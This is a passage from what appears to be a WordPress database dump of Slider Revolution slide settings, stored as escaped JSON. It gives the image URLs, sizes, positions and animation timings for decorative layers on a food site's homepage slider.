\"]},\"borderWidth\":[\"0\",\"0\",\"0\",\"0\"],\"originX\":50,\"originY\":50,\"speed\":\"0\"},\"actions\":{\"animationoverwrite\":\"wait\",\"triggerMemory\":\"keep\"},\"type\":\"image\"},\"10\":{\"text\":\"Image 8\",\"alias\":\"Fired\",\"uid\":10,\"media\":{\"imageUrl\":\"http:\\/\\/tummyrevolution.com\\/wp-content\\/uploads\\/2018\\/01\\/h2-slider1-graphic7.png\",\"imageId\":1084},\"size\":{\"width\":{\"d\":{\"v\":\"165px\",\"e\":true},\"n\":{\"v\":\"141px\",\"e\":true},\"t\":{\"v\":\"127px\",\"e\":true},\"m\":{\"v\":\"95px\",\"e\":true}},\"height\":{\"d\":{\"v\":\"165px\",\"e\":true},\"n\":{\"v\":\"141px\",\"e\":true},\"t\":{\"v\":\"127px\",\"e\":true},\"m\":{\"v\":\"95px\",\"e\":true}},\"originalWidth\":165,\"originalHeight\":165,\"aspectRatio\":{\"d\":{\"v\":1},\"n\":{\"v\":1},\"t\":{\"v\":1},\"m\":{\"v\":1}}},\"position\":{\"x\":{\"d\":{\"v\":\"319px\",\"e\":true},\"n\":{\"v\":\"299px\",\"e\":true},\"t\":{\"v\":\"79px\",\"e\":true},\"m\":{\"v\":\"51px\",\"e\":true}},\"y\":{\"d\":{\"v\":\"-278px\",\"e\":true},\"n\":{\"v\":\"-186px\",\"e\":true},\"t\":{\"v\":\"-265px\",\"e\":true},\"m\":{\"v\":\"-187px\",\"e\":true}},\"horizontal\":{\"d\":{\"v\":\"center\",\"e\":true},\"n\":{\"v\":\"center\",\"e\":true},\"t\":{\"v\":\"center\",\"e\":true},\"m\":{\"v\":\"center\",\"e\":true}},\"vertical\":{\"d\":{\"v\":\"middle\",\"e\":true},\"n\":{\"v\":\"middle\",\"e\":true},\"t\":{\"v\":\"middle\",\"e\":true},\"m\":{\"v\":\"middle\",\"e\":true}},\"zIndex\":11,\"position\":\"relative\"},\"attributes\":{\"tabIndex\":\"\"},\"behavior\":{\"intelligentInherit\":false},\"group\":{\"groupOrder\":11,\"columnbreakat\":\"mobile\"},\"timeline\":{\"frameOrder\":[{\"id\":\"frame_1\",\"start\":780},{\"id\":\"frame_999\",\"start\":2100}],\"frames\":{\"frame_0\":{\"alias\":\"Anim From\",\"transform\":{\"x\":{\"d\":{\"v\":\"{-250,250}\"},\"n\":{\"v\":\"{-250,250}\"},\"t\":{\"v\":\"{-250,250}\"},\"m\":{\"v\":\"{-250,250}\"}},\"y\":{\"d\":{\"v\":\"{-150,150}\"},\"n\":{\"v\":\"{-150,150}\"},\"t\":{\"v\":\"{-150,150}\"},\"m\":{\"v\":\"{-150,150}\"}},\"z\":0,\"scaleX\":\"{0,1}\",\"scaleY\":\"{0,1}\",\"opacity\":\"0\",\"rotationX\":\"{-90,90}\",\"rotationY\":\"{-90,90}\",\"rotationZ\":\"{-360,360}\",\"skewX\":\"0\",\"skewY\":\"0\",\"transformPerspective\":\"600\"},\"color\":{\"color\":\"transparent\"},\"timeline\":{\"speed\":1500,\"start\":780,\"startRelative\":780},\"chars\":{\"delay\":\"10\"},\"words\":{\"delay\":\"10\"},\"lines\":{\"delay\":\"10\"}},\"frame_1\":{\"alias\":\"Anim To\",\"transform\":{\"x\":{\"d\":{\"v\":0},\"n\":{\"v\":0},\"t\":{\"v\":0},\"m\":{\"v\":0}},\"y\":{\"d\":{\"v\":0},\"n\":{\"v\":0},\"t\":{\"v\":0},\"m\":{\"v\":0}},\"z\":0,\"scaleX\":\"1\",\"scaleY\":\"1\",\"opacity\":\"1\",\"rotationX\":0,\"rotationY\":0,\"rotationZ\":0,\"skewX\":\"0\",\"skewY\":\"0\",\"transformPerspective\":\"600\"},\"timeline\":{\"speed\":1500,\"start\":780,\"startRelative\":780},\"chars\":{\"delay\":\"10\"},\"words\":{\"delay\":\"10\"},\"lines\":{\"delay\":\"10\"}},\"frame_999\":{\"alias\":\"Anim To\",\"transform\":{\"x\":{\"d\":{\"v\":\"inherit\"},\"n\":{\"v\":\"inherit\"},\"t\":{\"v\":\"inherit\"},\"m\":{\"v\":\"inherit\"}},\"y\":{\"d\":{\"v\":\"inherit\"},\"n\":{\"v\":\"inherit\"},\"t\":{\"v\":\"inherit\"},\"m\":{\"v\":\"inherit\"}},\"z\":\"inherit\",\"scaleX\":\"inherit\",\"scaleY\":\"inherit\",\"opacity\":\"0\",\"rotationX\":\"inherit\",\"rotationY\":\"inherit\",\"rotationZ\":\"inherit\",\"skewX\":\"inherit\",\"skewY\":\"inherit\",\"transformPerspective\":\"600\"},\"color\":{\"color\":\"transparent\"},\"timeline\":{\"speed\":2000,\"start\":2100,\"startRelative\":-180,\"endWithSlide\":true},\"chars\":{\"delay\":\"10\"},\"words\":{\"delay\":\"10\"},\"lines\":{\"delay\":\"10\"}}},\"loop\":{\"yoyo_move\":true,\"speed\":4000}},\"idle\":{\"color\":{\"d\":{\"e\":true},\"n\":{\"e\":true},\"t\":{\"e\":true},\"m\":{\"e\":true}},\"margin\":{\"d\":{\"v\":[\"0\",\"0\",\"0\",\"0\"],\"e\":true},\"n\":{\"v\":[\"0\",\"0\",\"0\",\"0\"],\"e\":true},\"t\":{\"v\":[\"0\",\"0\",\"0\",\"0\"],\"e\":true},\"m\":{\"v\":[\"0\",\"0\",\"0\",\"0\"],\"e\":true}},\"padding\":{\"d\":{\"v\":[\"0\",\"0\",\"0\",\"0\"],\"e\":true},\"n\":{\"v\":[\"0\",\"0\",\"0\",\"0\"],\"e\":true},\"t\":{\"v\":[\"0\",\"0\",\"0\",\"0\"],\"e\":true},\"m\":{\"v\":[\"0\",\"0\",\"0\",\"0\"],\"e\":true}},\"autolinebreak\":false,\"fontFamily\":\"\",\"fontSize\":{\"d\":{\"e\":true},\"n\":{\"e\":true},\"t\":{\"e\":true},\"m\":{\"e\":true}},\"fontWeight\":{\"d\":{\"e\":true},\"n\":{\"e\":true},\"t\":{\"e\":true},\"m\":{\"e\":true}},\"letterSpacing\":{\"d\":{\"e\":true},\"n\":{\"e\":true},\"t\":{\"e\":true},\"m\":{\"e\":true}},\"lineHeight\":{\"d\":{\"v\":\"22\",\"e\":true},\"n\":{\"v\":\"22\",\"e\":true},\"t\":{\"v\":\"22\",\"e\":true},\"m\":{\"v\":\"22\",\"e\":true}},\"textAlign\":{\"d\":{\"v\":\"inherit\",\"e\":true},\"n\":{\"v\":\"inherit\",\"e\":true},\"t\":{\"v\":\"inherit\",\"e\":true},\"m\":{\"v\":\"inherit\",\"e\":true}},\"backgroundColor\":\"transparent\",\"borderRadius\":{\"v\":[\"0\",\"0\",\"0\",\"0\"]},\"borderWidth\":[\"0\",\"0\",\"0\",\"0\"],\"whiteSpace\":{\"d\":{\"e\":true},\"n\":{\"e\":true},\"t\":{\"e\":true},\"m\":{\"e\":true}},\"svg\":{\"color\":{\"d\":{\"e\":true},\"n\":{\"e\":true},\"t\":{\"e\":true},\"m\":{\"e\":true}}}},\"hover\":{\"borderRadius\":{\"v\":[\"0\",\"0\",\"0\",\"0\"]},\"borderWidth\":[\"0\",\"0\",\"0\",\"0\"],\"originX\":50,\"originY\":50,\"speed\":\"0\"},\"actions\":{\"animationoverwrite\":\"wait\",\"triggerMemory\":\"keep\"},\"type\":\"image\"},\"11\":{\"text\":\"Image 9\",\"alias\":\"Parce paprike\",\"uid\":11,\"media\":{\"imageUrl\":\"http:\\/\\/tummyrevolution.com\\/wp-content\\/uploads\\/2018\\/02\\/h2-slide3-graphic-4.png\",\"imageId\":2541},\"size\":{\"width\":{\"d\":{\"v\":\"167px\",\"e\":true},\"n\":{\"v\":\"167px\"},\"t\":{\"v\":\"167px\"},\"m\":{\"v\":\"167px\"}},\"height\":{\"d\":{\"v\":\"160px\",\"e\":true},\"n\":{\"v\":\"160px\"},\"t\":{\"v\":\"160px\"},\"m\":{\"v\":\"160px\"}},\"originalWidth\":167,\"originalHeight\":160,\"aspectRatio\":{\"d\":{\"v\":1.0437499999999999555910790149937383830547332763671875},\"n\":{\"v\":1.0437499999999999555910790149937383830547332763671875},\"t\":{\"v\":1.0437499999999999555910790149937383830547332763671875},\"m\":{\"v\":1.0437499999999999555910790149937383830547332763671875}}},\"position\":{\"x\":{\"d\":{\"v\":\"1593px\",\"e\":true},\"n\":{\"v\":\"1593px\"},\"t\":{\"v\":\"1593px\"},\"m\":{\"v\":\"1593px\"}},\"y\":{\"d\":{\"v\":\"276px\",\"e\":true},\"n\":{\"v\":\"276px\"},\"t\":{\"v\":\"276px\"},\"m\":{\"v\":\"276px\"}},\"horizontal\":{\"d\":{\"e\":true}},\"vertical\":{\"d\":{\"e\":true}},\"zIndex\":12,\"position\":\"relative\"},\"attributes\":{\"tabIndex\":\"\"},\"behavior\":{\"intelligentInherit\":false},\"group\":{\"groupOrder\":12,\"columnbreakat\":\"mobile\"},\"timeline\":{\"frameOrder\":[{\"id\":\"frame_1\",\"start\":350},{\"id\":\"frame_999\",\"start\":2100}],\"frames\":{\"frame_0\":{\"alias\":\"Anim From\",\"transform\":{\"x\":{\"d\":{\"v\":\"50px\"},\"n\":{\"v\":\"50px\"},\"t\":{\"v\":\"50px\"},\"m\":{\"v\":\"50px\"}},\"y\":{\"d\":{\"v\":\"inherit\"},\"n\":{\"v\":\"inherit\"},\"t\":{\"v\":\"inherit\"},\"m\":{\"v\":\"inherit\"}},\"z\":0,\"scaleX\":\"1\",\"scaleY\":\"1\",\"opacity\":\"0\",\"rotationX\":0,\"rotationY\":0,\"rotationZ\":0,\"skewX\":\"0\",\"skewY\":\"0\",\"transformPerspective\":\"600\"},\"color\":{\"color\":\"transparent\"},\"timeline\":{\"speed\":2200,\"start\":350,\"startRelative\":350},\"chars\":{\"delay\":\"10\"},\"words\":{\"delay\":\"10\"},\"lines\":{\"delay\":\"10\"}},\"frame_1\":{\"alias\":\"Anim To\",\"transform\":{\"x\":{\"d\":{\"v\":0},\"n\":{\"v\":0},\"t\":{\"v\":0},\"m\":{\"v\":0}},\"y\":{\"d\":{\"v\":0},\"n\":{\"v\":0},\"t\":{\"v\":0},\"m\":{\"v\":0}},\"z\":0,\"scaleX\":\"1\",\"scaleY\":\"1\",\"opacity\":\"1\",\"rotationX\":0,\"rotationY\":0,\"rotationZ\":0,\"skewX\":\"0\",\"skewY\":\"0\",\"transformPerspective\":\"600\"},\"timeline\":{\"speed\":2200,\"start\":350,\"startRelative\":350},\"chars\":{\"delay\":\"10\"},\"words\":{\"delay\":\"10\"},\"lines\":{\"delay\":\"10\"}},\"frame_999\":{\"alias\":\"Anim To\",\"transform\":{\"x\":{\"d\":{\"v\":\"inherit\"},\"n\":{\"v\":\"inherit\"},\"t\":{\"v\":\"inherit\"},\"m\":{\"v\":\"inherit\"}},\"y\":{\"d\":{\"v\":\"inherit\"},\"n\":{\"v\":\"inherit\"},\"t\":{\"v\":\"inherit\"},\"m\":{\"v\":\"inherit\"}},\"z\":\"inherit\",\"scaleX\":\"inherit\",\"scaleY\":\"inherit\",\"opacity\":\"0\",\"rotationX\":\"inherit\",\"rotationY\":\"inherit\",\"rotationZ\":\"inherit\",\"skewX\":\"inherit\",\"skewY\":\"inherit\",\"transformPerspective\":\"600\"},\"color\":{\"color\":\"transparent\"},\"timeline\":{\"start\":2100,\"startRelative\":-450,\"endWithSlide\":true},\"chars\":{\"delay\":\"10\"},\"words\":{\"delay\":\"10\"},\"lines\":{\"delay\":\"10\"}}},\"loop\":{\"yoyo_move\":true,\"speed\":4000}},\"idle\":{\"color\":{\"d\":{\"e\":true}},\"margin\":{\"d\":{\"v\":[\"0\",\"0\",\"0\",\"0\"],\"e\":true},\"n\":{\"v\":[\"0\",\"0\",\"0\",\"0\"]},\"t\":{\"v\":[\"0\",\"0\",\"0\",\"0\"]},\"m\":{\"v\":[\"0\",\"0\",\"0\",\"0\"]}},\"padding\":{\"d\":{\"v\":[\"0\",\"0\",\"0\",\"0\"],\"e\":true},\"n\":{\"v\":[\"0\",\"0\",\"0\",\"0\"]},\"t\":{\"v\":[\"0\",\"0\",\"0\",\"0\"]},\"m\":{\"v\":[\"0\",\"0\",\"0\",\"0\"]}},\"autolinebreak\":false,\"fontFamily\":\"\",\"fontSize\":{\"d\":{\"e\":true}},\"fontWeight\":{\"d\":{\"e\":true}},\"letterSpacing\":{\"d\":{\"e\":true}},\"lineHeight\":{\"d\":{\"v\":\"22\",\"e\":true},\"n\":{\"v\":\"22\"},\"t\":{\"v\":\"22\"},\"m\":{\"v\":\"22\"}},\"textAlign\":{\"d\":{\"v\":\"inherit\",\"e\":true},\"n\":{\"v\":\"inherit\"},\"t\":{\"v\":\"inherit\"},\"m\":{\"v\":\"inherit\"}},\"backgroundColor\":\"transparent\",\"borderRadius\":{\"v\":[\"0\",\"0\",\"0\",\"0\"]},\"borderWidth\":[\"0\",\"0\",\"0\",\"0\"],\"whiteSpace\":{\"d\":{\"e\":true}},\"svg\":{\"color\":{\"d\":{\"e\":true}}}},\"hover\":{\"borderRadius\":{\"v\":[\"0\",\"0\",\"0\",\"0\"]},\"borderWidth\":[\"0\",\"0\",\"0\",\"0\"],\"originX\":50,\"originY\":50,\"speed\":\"0\"},\"actions\":{\"animationoverwrite\":\"wait\",\"triggerMemory\":\"keep\"},\"type\":\"image\"}}','{\"0\":\"\",\"version\":\"6.1.6\"}'),(8,4,1,'{\"title\":\"first\",\"bg\":{\"type\":\"solid\",\"color\":\"#eff0ea\",\"video\":{\"args\":\"hd=1&wmode=opaque&showinfo=0&rel=0;\",\"argsVimeo\":\"title=0&byline=0&portrait=0&api=1\",\"volume\":\"100\"}},\"thumb\":{\"dimension\":\"slider\"},\"info\":{\"params\":[{\"v\":\"01\"},{\"v\":\"03\"}]},\"timeline\":{\"slots\":[\"default\"],\"duration\":[600]}}','{\"5\":{\"text\":\"Image 5\",\"alias\":\"Cvece\",\"uid\":5,\"media\":{\"imageUrl\":\"http:\\/\\/tummyrevolution.com\\/wp-content\\/uploads\\/2018\\/02\\/h3-slide1-graphic8.png\",\"imageId\":3227},\"size\":{\"width\":{\"d\":{\"v\":\"647px\",\"e\":true},\"n\":{\"v\":\"487px\",\"e\":true},\"t\":{\"v\":\"487px\"},\"m\":{\"v\":\"381px\",\"e\":true}},\"height\":{\"d\":{\"v\":\"653px\",\"e\":true},\"n\":{\"v\":\"492px\",\"e\":true},\"t\":{\"v\":\"492px\"},\"m\":{\"v\":\"385px\",\"e\":true}},\"originalWidth\":647,\"originalHeight\":653,\"aspectRatio\":{\"d\":{\"v\":0.9908116385911178713996605438296683132648468017578125},\"n\":{\"v\":0.9908116385911178713996605438296683132648468017578125},\"t\":{\"v\":0.9908116385911178713996605438296683132648468017578125},\"m\":{\"v\":0.9908116385911178713996605438296683132648468017578125}}},\"position\":{\"x\":{\"d\":{\"v\":\"-64px\",\"e\":true},\"n\":{\"v\":\"502px\",\"e\":true},\"t\":{\"v\":\"198px\",\"e\":true},\"m\":{\"v\":\"-100px\",\"e\":true}},\"y\":{\"d\":{\"v\":\"221px\",\"e\":true},\"n\":{\"v\":\"9px\",\"e\":true},\"t\":{\"v\":\"127px\",\"e\":true},\"m\":{\"v\":\"174px\",\"e\":true}},\"horizontal\":{\"d\":{\"v\":\"right\",\"e\":true},\"n\":{\"v\":\"center\",\"e\":true},\"t\":{\"v\":\"center\"},\"m\":{\"v\":\"right\",\"e\":true}},\"vertical\":{\"d\":{\"v\":\"bottom\",\"e\":true},\"n\":{\"v\":\"middle\",\"e\":true},\"t\":{\"v\":\"middle\"},\"m\":{\"v\":\"bottom\",\"e\":true}},\"zIndex\":5,\"position\":\"relative\"},\"attributes\":{\"tabIndex\":\"\"},\"behavior\":{\"autoResponsive\":false,\"intelligentInherit\":false,\"responsiveChilds\":false,\"baseAlign\":\"slide\",\"responsiveOffset\":false},\"group\":{\"groupOrder\":5,\"columnbreakat\":\"mobile\"},\"timeline\":{\"frameOrder\":[{\"id\":\"frame_1\",\"start\":870},{\"id\":\"frame_999\",\"start\":3000}],\"frames\":{\"frame_0\":{\"alias\":\"Anim From\",\"transform\":{\"x\":{\"d\":{\"v\":\"right\"},\"n\":{\"v\":\"right\"},\"t\":{\"v\":\"right\"},\"m\":{\"v\":\"right\"}},\"y\":{\"d\":{\"v\":\"inherit\"},\"n\":{\"v\":\"inherit\"},\"t\":{\"v\":\"inherit\"},\"m\":{\"v\":\"inherit\"}},\"z\":0,\"scaleX\":\"1\",\"scaleY\":\"1\",\"opacity\":\"1\",\"rotationX\":0,\"rotationY\":0,\"rotationZ\":0,\"skewX\":\"0\",\"skewY\":\"0\",\"transformPerspective\":\"600\"},\"color\":{\"color\":\"transparent\"},\"timeline\":{\"speed\":1570,\"start\":870,\"startRelative\":870},\"chars\":{\"delay\":\"10\"},\"words\":{\"delay\":\"10\"},\"lines\":{\"delay\":\"10\"}},\"frame_1\":{\"alias\":\"Anim To\",\"transform\":{\"x\":{\"d\":{\"v\":0},\"n\":{\"v\":0},\"t\":{\"v\":0},\"m\":{\"v\":0}},\"y\":{\"d\":{\"v\":0},\"n\":{\"v\":0},\"t\":{\"v\":0},\"m\":{\"v\":0}},\"z\":0,\"scaleX\":\"1\",\"scaleY\":\"1\",\"opacity\":\"1\",\"rotationX\":0,\"rotationY\":0,\"rotationZ\":0,\"skewX\":\"0\",\"skewY\":\"0\",\"transformPerspective\":\"600\"},\"timeline\":{\"speed\":1570,\"start\":870,\"startRelative\":870},\"chars\":{\"delay\":\"10\"},\"words\":{\"delay\":\"10\"},\"lines\":{\"delay\":\"10\"}},\"frame_999\":{\"alias\":\"Anim To\",\"transform\":{\"x\":{\"d\":{\"v\":\"inherit\"},\"n\":{\"v\":\"inherit\"},\"t\":{\"v\":\"inherit\"},\"m\":{\"v\":\"inherit\"}},\"y\":{\"d\":{\"v\":\"inherit\"},\"n\":{\"v\":\"inherit\"},\"t\":{\"v\":\"inherit\"},\"m\":{\"v\":\"inherit\"}},\"z\":\"inherit\",\"scaleX\":\"inherit\",\"scaleY\":\"inherit\",\"opacity\":\"0\",\"rotationX\":\"inherit\",\"rotationY\":\"inherit\",\"rotationZ\":\"inherit\",\"skewX\":\"inherit\",\"skewY\":\"inherit\",\"transformPerspective\":\"600\"},\"color\":{\"color\":\"transparent\"},\"timeline\":{\"speed\":480,\"start\":3000,\"startRelative\":560,\"endWithSlide\":true},\"chars\":{\"delay\":\"10\"},\"words\":{\"delay\":\"10\"},\"lines\":{\"delay\":\"10\"}}},\"loop\":{\"yoyo_move\":true,\"speed\":4000}},\"idle\":{\"color\":{\"d\":{\"e\":true},\"n\":{\"e\":true},\"m\":{\"e\":true}},\"margin\":{\"d\":{\"v\":[\"0\",\"0\",\"0\",\"0\"],\"e\":true},\"n\":{\"v\":[\"0\",\"0\",\"0\",\"0\"],\"e\":true},\"t\":{\"v\":[\"0\",\"0\",\"0\",\"0\"]},\"m\":{\"v\":[\"0\",\"0\",\"0\",\"0\"],\"e\":true}},\"padding\":{\"d\":{\"v\":[\"0\",\"0\",\"0\",\"0\"],\"e\":true},\"n\":{\"v\":[\"0\",\"0\",\"0\",\"0\"],\"e\":true},\"t\":{\"v\":[\"0\",\"0\",\"0\",\"0\"]},\"m\":{\"v\":[\"0\",\"0\",\"0\",\"0\"],\"e\":true}},\"autolinebreak\":false,\"fontFamily\":\"\",\"fontSize\":{\"d\":{\"e\":true},\"n\":{\"e\":true},\"m\":{\"e\":true}},\"fontWeight\":{\"d\":{\"e\":true},\"n\":{\"e\":true},\"m\":{\"e\":true}},\"letterSpacing\":{\"d\":{\"e\":true},\"n\":{\"e\":true},\"m\":{\"e\":true}},\"lineHeight\":{\"d\":{\"v\":\"22\",\"e\":true},\"n\":{\"v\":\"22\",\"e\":true},\"t\":{\"v\":\"22\"},\"m\":{\"v\":\"22\",\"e\":true}},\"textAlign\":{\"d\":{\"v\":\"inherit\",\"e\":true},\"n\":{\"v\":\"inherit\",\"e\":true},\"t\":{\"v\":\"inherit\"},\"m\":{\"v\":\"inherit\",\"e\":true}},\"backgroundColor\":\"transparent\",\"borderRadius\":{\"v\":[\"0\",\"0\",\"0\",\"0\"]},\"borderWidth\":[\"0\",\"0\",\"0\",\"0\"],\"whiteSpace\":{\"d\":{\"e\":true},\"n\":{\"e\":true},\"m\":{\"e\":true}},\"svg\":{\"color\":{\"d\":{\"e\":true},\"n\":{\"e\":true},\"m\":{\"e\":true}}}},\"hover\":{\"borderRadius\":{\"v\":[\"0\",\"0\",\"0\",\"0\"]},\"borderWidth\":[\"0\",\"0\",\"0\",\"0\"],\"originX\":50,\"originY\":50,\"speed\":\"0\"},\"actions\":{\"animationoverwrite\":\"wait\",\"triggerMemory\":\"keep\"},\"type\":\"image\"},\"9\":{\"text\":\"Image 9\",\"alias\":\"Leaf 2\",\"uid\":9,\"media\":{\"imageUrl\":\"http:\\/\\/tummyrevolution.com\\/wp-content\\/uploads\\/2018\\/02\\/h3-slide1-graphic2-1.png\",\"imageId\":3234},\"size\":{\"width\":{\"d\":{\"v\":\"913px\",\"e\":true},\"n\":{\"v\":\"788px\",\"e\":true},\"t\":{\"v\":\"605px\",\"e\":true},\"m\":{\"v\":\"209px\",\"e\":true}},\"height\":{\"d\":{\"v\":\"279px\",\"e\":true},\"n\":{\"v\":\"241px\",\"e\":true},\"t\":{\"v\":\"185px\",\"e\":true},\"m\":{\"v\":\"64px\",\"e\":true}},\"originalWidth\":1021,\"originalHeight\":312,\"aspectRatio\":{\"d\":{\"v\":3.272435897435897356189116180757991969585418701171875},\"n\":{\"v\":3.272435897435897356189116180757991969585418701171875},\"t\":{\"v\":3.272435897435897356189116180757991969585418701171875},\"m\":{\"v\":3.272435897435897356189116180757991969585418701171875}}},\"position\":{\"x\":{\"d\":{\"v\":\"468px\",\"e\":true},\"n\":{\"v\":\"345px\",\"e\":true},\"t\":{\"v\":\"-15px\",\"e\":true},\"m\":{\"v\":\"266px\",\"e\":true}},\"y\":{\"d\":{\"v\":\"179px\",\"e\":true},\"n\":{\"v\":\"169px\",\"e\":true},\"t\":{\"v\":\"269px\",\"e\":true},\"m\":{\"v\":\"166px\",\"e\":true}},\"horizontal\":{\"d\":{\"v\":\"right\",\"e\":true},\"n\":{\"v\":\"center\",\"e\":true},\"t\":{\"v\":\"center\",\"e\":true},\"m\":{\"v\":\"right\",\"e\":true}},\"vertical\":{\"d\":{\"v\":\"bottom\",\"e\":true},\"n\":{\"v\":\"middle\",\"e\":true},\"t\":{\"v\":\"middle\",\"e\":true},\"m\":{\"v\":\"bottom\",\"e\":true}},\"zIndex\":6,\"position\":\"relative\"},\"attributes\":{\"tabIndex\":\"\"},\"behavior\":{\"autoResponsive\":false,\"intelligentInherit\":false,\"responsiveChilds\":false,\"baseAlign\":\"slide\",\"responsiveOffset\":false},\"group\":{\"groupOrder\":6,\"columnbreakat\":\"mobile\"},\"timeline\":{\"frameOrder\":[{\"id\":\"frame_1\",\"start\":750},{\"id\":\"frame_999\",\"start\":3000}],\"frames\":{\"frame_0\":{\"alias\":\"Anim From\",\"transform\":{\"x\":{\"d\":{\"v\":\"right\"},\"n\":{\"v\":\"right\"},\"t\":{\"v\":\"right\"},\"m\":{\"v\":\"right\"}},\"y\":{\"d\":{\"v\":\"inherit\"},\"n\":{\"v\":\"inherit\"},\"t\":{\"v\":\"inherit\"},\"m\":{\"v\":\"inherit\"}},\"z\":0,\"scaleX\":\"1\",\"scaleY\":\"1\",\"opacity\":\"1\",\"rotationX\":0,\"rotationY\":0,\"rotationZ\":0,\"skewX\":\"0\",\"skewY\":\"0\",\"transformPerspective\":\"600\"},\"color\":{\"color\":\"transparent\"},\"timeline\":{\"speed\":1690,\"start\":750,\"startRelative\":750},\"chars\":{\"delay\":\"10\"},\"words\":{\"delay\":\"10\"},\"lines\":{\"delay\":\"10\"}},\"frame_1\":{\"alias\":\"Anim To\",\"transform\":{\"x\":{\"d\":{\"v\":0},\"n\":{\"v\":0},\"t\":{\"v\":0},\"m\":{\"v\":0}},\"y\":{\"d\":{\"v\":0},\"n\":{\"v\":0},\"t\":{\"v\":0},\"m\":{\"v\":0}},\"z\":0,\"scaleX\":\"1\",\"scaleY\":\"1\",\"opacity\":\"1\",\"rotationX\":0,\"rotationY\":0,\"rotationZ\":0,\"skewX\":\"0\",\"skewY\":\"0\",\"transformPerspective\":\"600\"},\"timeline\":{\"speed\":1690,\"start\":750,\"startRelative\":750},\"chars\":{\"delay\":\"10\"},\"words\":{\"delay\":\"10\"},\"lines\":{\"delay\":\"10\"}},\"frame_999\":{\"alias\":\"Anim To\",\"transform\":{\"x\":{\"d\":{\"v\":\"inherit\"},\"n\":{\"v\":\"inherit\"},\"t\":{\"v\":\"inherit\"},\"m\":{\"v\":\"inherit\"}},\"y\":{\"d\":{\"v\":\"inherit\"},\"n\":{\"v\":\"inherit\"},\"t\":{\"v\":\"inherit\"},\"m\":{\"v\":\"inherit\"}},\"z\":\"inherit\",\"scaleX\":\"inherit\",\"scaleY\":\"inherit\",\"opacity\":\"0\",\"rotationX\":\"inherit\",\"rotationY\":\"inherit\",\"rotationZ\":\"inherit\",\"skewX\":\"inherit\",\"skewY\":\"inherit\",\"transformPerspective\":\"600\"},\"color\":{\"color\":\"transparent\"},\"timeline\":{\"speed\":470,\"start\":3000,\"startRelative\":560,\"endWithSlide\":true},\"chars\":{\"delay\":\"10\"},\"words\":{\"delay\":\"10\"},\"lines\":{\"delay\":\"10\"}}},\"loop\":{\"yoyo_move\":true,\"speed\":4000}},\"idle\":{\"color\":{\"d\":{\"e\":true},\"n\":{\"e\":true},\"t\":{\"e\":true},\"m\":{\"e\":true}},\"margin\":{\"d\":{\"v\":[\"0\",\"0\",\"0\",\"0\"],\"e\":true},\"n\":{\"v\":[\"0\",\"0\",\"0\",\"0\"],\"e\":true},\"t\":{\"v\":[\"0\",\"0\",\"0\",\"0\"],\"e\":true},\"m\":{\"v\":[\"0\",\"0\",\"0\",\"0\"],\"e\":true}},\"padding\":{\"d\":{\"v\":[\"0\",\"0\",\"0\",\"0\"],\"e\":true},\"n\":{\"v\":[\"0\",\"0\",\"0\",\"0\"],\"e\":true},\"t\":{\"v\":[\"0\",\"0\",\"0\",\"0\"],\"e\":true},\"m\":{\"v\":[\"0\",\"0\",\"0\",\"0\"],\"e\":true}},\"autolinebreak\":false,\"fontFamily\":\"\",\"fontSize\":{\"d\":{\"e\":true},\"n\":{\"e\":true},\"t\":{\"e\":true},\"m\":{\"e\":true}},\"fontWeight\":{\"d\":{\"e\":true},\"n\":{\"e\":true},\"t\":{\"e\":true},\"m\":{\"e\":true}},\"letterSpacing\":{\"d\":{\"e\":true},\"n\":{\"e\":true},\"t\":{\"e\":true},\"m\":{\"e\":true}},\"lineHeight\":{\"d\":{\"v\":\"22\",\"e\":true},\"n\":{\"v\":\"22\",\"e\":true},\"t\":{\"v\":\"22\",\"e\":true},\"m\":{\"v\":\"22\",\"e\":true}},\"textAlign\":{\"d\":{\"v\":\"inherit\",\"e\":true},\"n\":{\"v\":\"inherit\",\"e\":true},\"t\":{\"v\":\"inherit\",\"e\":true},\"m\":{\"v\":\"inherit\",\"e\":true}},\"backgroundColor\":\"transparent\",\"borderRadius\":{\"v\":[\"0\",\"0\",\"0\",\"0\"]},\"borderWidth\":[\"0\",\"0\",\"0\",\"0\"],\"whiteSpace\":{\"d\":{\"e\":true},\"n\":{\"e\":true},\"t\":{\"e\":true},\"m\":{\"e\":true}},\"svg\":{\"color\":{\"d\":{\"e\":true},\"n\":{\"e\":true},\"t\":{\"e\":true},\"m\":{\"e\":true}}}},\"hover\":{\"borderRadius\":{\"v\":[\"0\",\"0\",\"0\",\"0\"]},\"borderWidth\":[\"0\",\"0\",\"0\",\"0\"],\"originX\":50,\"originY\":50,\"speed\":\"0\"},\"actions\":{\"animationoverwrite\":\"wait\",\"triggerMemory\":\"keep\"},\"visibility\":{\"m\":false},\"type\":\"image\"},\"6\":{\"text\":\"Image 6\",\"alias\":\"Leaf1\",\"uid\":6,\"media\":{\"imageUrl\":\"http:\\/\\/tummyrevolution.com\\/wp-content\\/uploads\\/2018\\/02\\/h3-slide1-graphic2.png\",\"imageId\":3229},\"size\":{\"width\":{\"d\":{\"v\":\"1021px\",\"e\":true},\"n\":{\"v\":\"454px\",\"e\":true},\"t\":{\"v\":\"454px\"},\"m\":{\"v\":\"330px\",\"e\":true}},\"height\":{\"d\":{\"v\":\"312px\",\"e\":true},\"n\":{\"v\":\"139px\",\"e\":true},\"t\":{\"v\":\"139px\"},\"m\":{\"v\":\"101px\",\"e\":true}},\"originalWidth\":1021,\"originalHeight\":312,\"aspectRatio\":{\"d\":{\"v\":3.272435897435897356189116180757991969585418701171875},\"n\":{\"v\":3.272435897435897356189116180757991969585418701171875},\"t\":{\"v\":3.272435897435897356189116180757991969585418701171875},\"m\":{\"v\":3.272435897435897356189116180757991969585418701171875}}},\"position\":{\"x\":{\"d\":{\"v\":\"-54px\",\"e\":true},\"n\":{\"v\":\"194px\",\"e\":true},\"t\":{\"v\":\"-134px\",\"e\":true},\"m\":{\"v\":\"-38px\",\"e\":true}},\"y\":{\"d\":{\"v\":\"169px\",\"e\":true},\"n\":{\"v\":\"-290px\",\"e\":true},\"t\":{\"v\":\"113px\",\"e\":true},\"m\":{\"v\":\"165px\",\"e\":true}},\"horizontal\":{\"d\":{\"v\":\"right\",\"e\":true},\"n\":{\"v\":\"right\",\"e\":true},\"t\":{\"v\":\"right\"},\"m\":{\"v\":\"right\",\"e\":true}},\"vertical\":{\"d\":{\"v\":\"bottom\",\"e\":true},\"n\":{\"v\":\"bottom\",\"e\":true},\"t\":{\"v\":\"bottom\"},\"m\":{\"v\":\"bottom\",\"e\":true}},\"zIndex\":7,\"position\":\"relative\"},\"attributes\":{\"tabIndex\":\"\"},\"behavior\":{\"au